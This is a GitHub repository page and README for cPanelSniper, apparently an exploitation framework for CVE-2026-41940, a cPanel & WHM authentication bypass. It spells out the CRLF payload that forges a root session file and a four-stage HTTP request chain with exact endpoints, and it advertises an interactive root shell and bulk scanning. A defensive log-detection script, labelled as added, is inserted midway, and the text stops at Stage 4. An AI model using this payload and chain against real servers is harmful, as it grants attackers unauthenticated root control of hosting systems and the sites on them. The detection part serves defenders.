ynsmroztas/cPanelSniper

239
+43/day
80
Python

CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection

From the README

cPanelSniper

CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection 4-stage exploit chain · Interactive WHM Shell · Bulk scanner · Pipeline ready · stdlib only

Overview

cPanelSniper is a focused exploitation framework for CVE-2026-41940, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the Authorization HTTP header — without any valid credentials.

  • CVSS Score: 10.0 (Critical)
  • In-the-wild exploitation: Confirmed (April 2026)
  • Affected installs: ~70 million domains running cPanel & WHM
  • No dependencies: Pure Python stdlib — no pip, no requests, no external packages

For authorized penetration testing and bug bounty programs only.

How It Works

The root cause lives in Session.pm: the saveSession() function calls filter_sessiondata() after writing the session file to disk. This means CRLF characters embedded in the Authorization: Basic header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.

Normal flow:
  POST /login/ → filter_sessiondata() → write session → auth check

Vulnerable flow:
  POST /login/ → write session (CRLF payload injected) → filter_sessiondata() → auth check reads poisoned file

The CRLF Payload

The Authorization: Basic value decodes to:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

These fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.
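From the defender's side, the useful property of this payload is that a legitimate Basic credential never contains CR or LF, and never contains cPanel session-file field names. The following is an added detection example, not code from the cPanelSniper repository: it decodes `Authorization: Basic` values found in request logs and flags any credential that contains control characters or the field names listed above. It assumes a reverse proxy or WAF in front of cpsrvd records the header value (cpsrvd's own access logs are not assumed to), and the log lines are constructed for illustration.

```python
import base64
import binascii
import re

# Session-file field names the README says the payload injects.
INJECTED_FIELDS = (
    "successful_internal_auth_with_timestamp",
    "tfa_verified",
    "hasroot",
)

# Matches a logged "Authorization: Basic <token>" header. Assumption: the
# proxy or WAF log in front of cpsrvd includes the raw header value.
_AUTH_RE = re.compile(r"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_basic(credential):
    """Base64-encode a 'user:pass' string the way a Basic header carries it."""
    return base64.b64encode(credential.encode("utf-8")).decode("ascii")


def decode_basic(token):
    """Decode a Basic token; return None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_basic_credential(decoded):
    """Return the reasons a decoded credential looks like the CRLF payload (empty if clean)."""
    reasons = []
    if "\r" in decoded or "\n" in decoded:
        reasons.append("CR/LF inside Basic credential")
    lowered = decoded.lower()
    for field in INJECTED_FIELDS:
        if field + "=" in lowered:
            reasons.append("session field in credential: " + field)
    return reasons


def scan_log_line(line):
    """Return (token, reasons) for a line whose Basic credential is suspicious, else None."""
    m = _AUTH_RE.search(line)
    if not m:
        return None
    decoded = decode_basic(m.group(1))
    if decoded is None:
        return None
    reasons = inspect_basic_credential(decoded)
    return (m.group(1), reasons) if reasons else None


def scan_log(lines):
    """Return [(line_number, token, reasons)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        hit = scan_log_line(line)
        if hit:
            hits.append((n, hit[0], hit[1]))
    return hits


# Constructed sample lines (not real traffic): an ordinary login, a request
# carrying a CR/LF-laden credential of the shape the README describes, and a
# request with no Authorization header at all.
SAMPLE_LOG_LINES = [
    '198.51.100.10 "GET / HTTP/1.1" Authorization: Basic ' + encode_basic("admin:s3cret"),
    '203.0.113.7 "GET / HTTP/1.1" Cookie: whostmgrsession=... Authorization: Basic '
    + encode_basic("root:x\r\nhasroot=1"),
    '192.0.2.5 "GET /login/ HTTP/1.1"',
]

if __name__ == "__main__":
    for n, token, reasons in scan_log(SAMPLE_LOG_LINES):
        print(f"line {n}: {token} -> {'; '.join(reasons)}")
```

The same `inspect_basic_credential` check works as an inline reject rule at the proxy: a Basic credential that decodes to contain CR or LF is malformed under RFC 7617 regardless of this CVE, so dropping such requests before they reach cpsrvd costs nothing for legitimate clients and removes the injection vector while the patch is rolled out.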

4-Stage Exploit Chain

┌─────────────────────────────────────────────────────────────┐
│  Stage 0 — Canonical Hostname Discovery                     │
│  GET /openid_connect/cpanelid → 307 → real hostname         │
├─────────────────────────────────────────────────────────────┤
│  Stage 1 — Mint Preauth Session                             │
│  POST /login/?login_only=1  (wrong creds)                   │
│  ← 401 + whostmgrsession cookie                             │
├─────────────────────────────────────────────────────────────┤
│  Stage 2 — CRLF Injection                                   │
│  GET / + Cookie: session + Authorization: Basic    │
│  cpsrvd writes CRLF fields into session file                │
│  ← 307 Location: /cpsessXXXXXXXXXX/...                     │
├─────────────────────────────────────────────────────────────┤
│  Stage 3 — Propagate (do_token_denied gadget)               │
│  GET /scripts2/listaccts                                    │
│  Triggers raw→cache flush — injected fields become active   │
│  ← 401 Token denied (expected)                              │
├─────────────────────────────────────────────────────────────┤
│  Stage 4 — Verify WHM Root Access